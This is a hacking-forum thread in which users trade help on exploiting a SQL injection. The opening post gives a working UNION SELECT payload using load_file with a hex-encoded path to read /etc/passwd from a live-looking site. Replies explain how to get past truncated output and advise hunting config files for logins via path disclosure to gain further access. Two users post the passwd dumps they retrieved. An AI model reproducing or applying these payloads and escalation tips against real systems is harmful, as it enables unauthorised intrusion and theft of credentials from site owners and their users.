Waraxe IT Security Portal

vcore · Regular user

Hi, i'm trying to read /etc/passwd by injecting

http://www.site.com/page.php?d_id=1+UNION+ALL+SELECT+1,2,load_file(0x2f6574632f706173737764),4--

The thing is i'm, just getting the first part of the line wich is "root:x:0:0:root:/roo" and i can't see the rest of it.

Any idea?

PS: I already check the source, but i couldn't find anything more : /

PS 2: I've been reading about /etc/passwd, and the thing is that i don't understand how can be X a coded password :S

Vcore

_mranderson_ · Valuable expert

Probably the script is outputting just the first line; try hexing the string:
hex(load_file('/etc/passwd'))

anyways, reading the passwd file nowadays will just give you an idea of what users can login into the system. Almost every passwd file is shadowed, which means that if you do not have root access to the box, you ll have to use a local root exploit to read the shadow file where the hashes are stored.
The X you are referring to is just a dummy replacement for the pasword's hash.

I suggest you to try reading some config file inside the server to find some login you can use to get farther access. If you do not have a clue, google "path disclosure" and the try to access config.php files in the webserver's root folder. If you can't figure it out, try "/var/www/" or "/home/www/" or "/var/vhosts/site.com/www/", hopefully you will find something.

waraxe · Site admin

It's easy to understand the essence of the problem - column, you are using for data fetch, is probably declared as varchar(20), so you can get only 20 bytes of data at once. You can try to use other columns or make use of substring():

http://dev.mysql.com/doc/refman/5.1/en/string-functions.html#function_substring

As for "X"-s instead of password hashes - A long time ago in a galaxy far, far away ... there was decision about moving password hashes to the "/etc/shadow" in linux distros and "/etc/master.passwd" in *bsd systems. And only root can by default read those files Smile

http://en.wikipedia.org/wiki/Shadow_password

vcore · Regular user

I went for the easiest solution wich was doing it in another field and i get this:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shu

Now it's time to research for some "path disclosure".

Thanks for you answers! Smile

pexli · Valuable expert

tesh80 · Regular user

help me for that

how we can me find all url and user :

i find that

daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
Debian-exim:x:100:102::/var/spool/exim4:/bin/false
statd:x:101:65534::/var/lib/nfs:/bin/false
identd:x:102:65534::/var/run/identd:/bin/false
law:x:1000:1000:law,,,:/home/law:/bin/bash
ntp:x:103:104::/home/ntp:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
snmp:x:105:65534::/var/lib/snmp:/bin/false
mysql:x:1001:1001::/home/mysql:/bin/sh

but i want all etc/passwd
he can help me